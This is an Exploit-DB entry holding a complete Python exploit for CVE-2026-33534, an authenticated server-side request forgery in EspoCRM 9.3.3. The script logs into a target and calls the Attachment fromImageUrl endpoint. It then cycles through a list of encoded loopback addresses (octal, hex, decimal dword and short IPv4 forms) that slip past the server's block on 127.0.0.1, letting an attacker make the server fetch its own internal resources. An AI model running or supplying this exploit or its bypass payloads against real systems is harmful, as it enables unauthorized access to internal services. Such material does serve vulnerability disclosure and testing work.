EspoCRM 9.3.3 - SSRF

EDB-ID:

52583




Platform:

Multiple

Date:

2026-05-27


# Exploit Title: EspoCRM 9.3.3 - Authenticated SSRF via Alternative IPv4 Notation
# Google Dork: N/A
# Date: 2026-05-08
# Exploit Author: Max Gabriel (https://github.com/EntroVyx)
# Vendor Homepage: https://www.espocrm.com/
# Software Link: https://github.com/espocrm/espocrm/releases/tag/9.3.3
# Version: 9.3.3
# Tested on: EspoCRM 9.3.3, Debian/Kali, Apache/PHP
# CVE : CVE-2026-33534
# Advisory: https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73
#
# Usage:
#   python3 CVE-2026-33534.py -u http://127.0.0.1:8083 -U admin -P 'Admin12345!' --internal-port 8083 --cleanup
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --internal-port 9002 --internal-path /interno.png
#   python3 CVE-2026-33534.py -u https://target.example -U user -P pass --payload 0x7f000001 --payload 2130706433

import argparse
import json
import sys
from pathlib import Path
from urllib.parse import urlparse, urlunparse

import requests


DEFAULT_LOOPBACK_PAYLOADS = [
    ("octal dotted", "0177.0.0.1"),
    ("octal dotted padded", "0177.0000.0000.0001"),
    ("octal compressed", "0177.1"),
    ("hex dotted", "0x7f.0.0.1"),
    ("hex dotted full", "0x7f.0x0.0x0.0x1"),
    ("hex dword", "0x7f000001"),
    ("decimal dword", "2130706433"),
    ("octal dword", "017700000001"),
    ("short IPv4 two-part", "127.1"),
    ("short IPv4 three-part", "127.0.1"),
    ("zero-padded dotted", "127.000.000.001"),
    ("long zero-padded octal", "0000000000000000000000000177.0.0.1"),
]


def normalize_base_url(value):
    value = value.rstrip("/")
    parsed = urlparse(value)

    if not parsed.scheme or not parsed.netloc:
        raise argparse.ArgumentTypeError("target URL must include scheme and host")

    return value


def default_internal_port(base_url):
    parsed = urlparse(base_url)

    if parsed.port:
        return parsed.port

    return 443 if parsed.scheme == "https" else 80


def ensure_path(value):
    if not value:
        return "/"

    return value if value.startswith("/") else f"/{value}"


def make_url(base_url, host, internal_port, internal_path):
    parsed = urlparse(base_url)
    netloc = host

    default_port = 443 if parsed.scheme == "https" else 80

    if internal_port != default_port:
        netloc = f"{host}:{internal_port}"

    return urlunparse((parsed.scheme, netloc, ensure_path(internal_path), "", "", ""))


def make_control_url(base_url, internal_port, internal_path):
    return make_url(base_url, "127.0.0.1", internal_port, internal_path)


def load_payloads(args):
    payloads = list(DEFAULT_LOOPBACK_PAYLOADS)

    if args.no_default_payloads:
        payloads = []

    for item in args.payload or []:
        payloads.append(("custom", item.strip()))

    if args.payload_file:
        for line_number, raw_line in enumerate(Path(args.payload_file).read_text().splitlines(), start=1):
            line = raw_line.strip()

            if not line or line.startswith("#"):
                continue

            if "=" in line:
                label, host = line.split("=", 1)
                payloads.append((label.strip() or f"file:{line_number}", host.strip()))
            else:
                payloads.append((f"file:{line_number}", line))

    seen = set()
    output = []

    for label, host in payloads:
        if not host or host in seen:
            continue

        seen.add(host)
        output.append((label, host))

    return output


def post_from_image_url(session, base_url, image_url, field, parent_type, parent_id, timeout):
    endpoint = f"{base_url}/api/v1/Attachment/fromImageUrl"
    payload = {
        "url": image_url,
        "field": field,
        "parentType": parent_type,
    }

    if parent_id:
        payload["parentId"] = parent_id

    return session.post(endpoint, json=payload, timeout=timeout)


def parse_json(response):
    try:
        return response.json()
    except json.JSONDecodeError:
        return None


def short_body(response):
    body = response.text.replace("\r", "\\r").replace("\n", "\\n")

    if len(body) > 420:
        return body[:420] + "..."

    return body


def delete_attachment(session, base_url, attachment_id, timeout):
    response = session.delete(f"{base_url}/api/v1/Attachment/{attachment_id}", timeout=timeout)

    return response.status_code in {200, 204}


def is_successful_bypass(response):
    data = parse_json(response)

    return (
        response.status_code == 200 and
        isinstance(data, dict) and
        bool(data.get("id"))
    ), data


def print_result(label, host, response, data):
    if isinstance(data, dict) and data.get("id"):
        print(
            f"[+] {label:24} {host:38} HTTP {response.status_code} "
            f"id={data.get('id')} type={data.get('type')} size={data.get('size')}"
        )

        return

    reason = response.headers.get("X-Status-Reason") or short_body(response) or "-"
    print(f"[-] {label:24} {host:38} HTTP {response.status_code} {reason}")


def main():
    parser = argparse.ArgumentParser(
        description="Authenticated EspoCRM CVE-2026-33534 SSRF verification exploit with multiple encoded loopback payloads."
    )
    parser.add_argument("-u", "--url", required=True, type=normalize_base_url, help="Base URL, e.g. http://host:8083")
    parser.add_argument("-U", "--username", required=True, help="EspoCRM username")
    parser.add_argument("-P", "--password", required=True, help="EspoCRM password")
    parser.add_argument("--internal-port", type=int, help="Internal loopback port for the self-fetch PoC")
    parser.add_argument("--internal-path", default="/client/img/logo-light.svg", help="Internal path for the self-fetch PoC")
    parser.add_argument("--payload", action="append", help="Additional loopback host notation to test, e.g. 0x7f000001")
    parser.add_argument("--payload-file", help="File with one host payload per line, or label=host")
    parser.add_argument("--no-default-payloads", action="store_true", help="Use only --payload/--payload-file entries")
    parser.add_argument("--field", default="avatar", help="Attachment field used by fromImageUrl")
    parser.add_argument("--parent-type", default="User", help="Parent entity type used by fromImageUrl")
    parser.add_argument("--parent-id", help="Optional parent entity id")
    parser.add_argument("--timeout", type=float, default=15.0, help="HTTP timeout")
    parser.add_argument("--cleanup", action="store_true", help="Attempt to delete attachments created by successful payloads")
    parser.add_argument("--stop-on-first", action="store_true", help="Stop after the first successful payload")
    parser.add_argument("--insecure", action="store_true", help="Disable TLS certificate verification")
    args = parser.parse_args()

    payloads = load_payloads(args)

    if not payloads:
        print("[-] No payloads to test.")
        return 2

    internal_port = args.internal_port or default_internal_port(args.url)
    control_url = make_control_url(args.url, internal_port, args.internal_path)

    session = requests.Session()
    session.auth = (args.username, args.password)
    session.headers.update({"Accept": "application/json"})
    session.verify = not args.insecure

    print(f"[*] Target: {args.url}")
    print(f"[*] Control URL: {control_url}")
    print(f"[*] Payload count: {len(payloads)}")

    control = post_from_image_url(
        session,
        args.url,
        control_url,
        args.field,
        args.parent_type,
        args.parent_id,
        args.timeout,
    )

    print(f"[*] Control response: HTTP {control.status_code} {control.headers.get('X-Status-Reason') or short_body(control) or '-'}")

    if control.status_code != 403:
        print("[!] The direct 127.0.0.1 control was not blocked with HTTP 403. Results may not prove CVE-2026-33534.")

    successes = []

    for label, host in payloads:
        ssrf_url = make_url(args.url, host, internal_port, args.internal_path)
        response = post_from_image_url(
            session,
            args.url,
            ssrf_url,
            args.field,
            args.parent_type,
            args.parent_id,
            args.timeout,
        )
        successful, data = is_successful_bypass(response)
        print_result(label, host, response, data)

        if successful:
            successes.append((label, host, ssrf_url, data))

            if args.cleanup and data.get("id"):
                if delete_attachment(session, args.url, data["id"], args.timeout):
                    print(f"    cleanup: deleted attachment {data['id']}")
                else:
                    print(f"    cleanup: failed to delete attachment {data['id']}")

            if args.stop_on_first:
                break

    if not successes:
        print("[-] No encoded loopback payload produced an attachment.")
        return 2

    print("")
    print("[+] Vulnerable behavior confirmed.")
    print(f"[+] Direct loopback control: HTTP {control.status_code}")
    print(f"[+] Successful payloads: {len(successes)}")

    for label, host, ssrf_url, data in successes:
        print(f"    - {label}: {host} -> {data.get('type')} ({ssrf_url})")

    return 0 if control.status_code == 403 else 1


if __name__ == "__main__":
    try:
        sys.exit(main())
    except requests.RequestException as exc:
        print(f"[-] HTTP error: {exc}")
        sys.exit(1)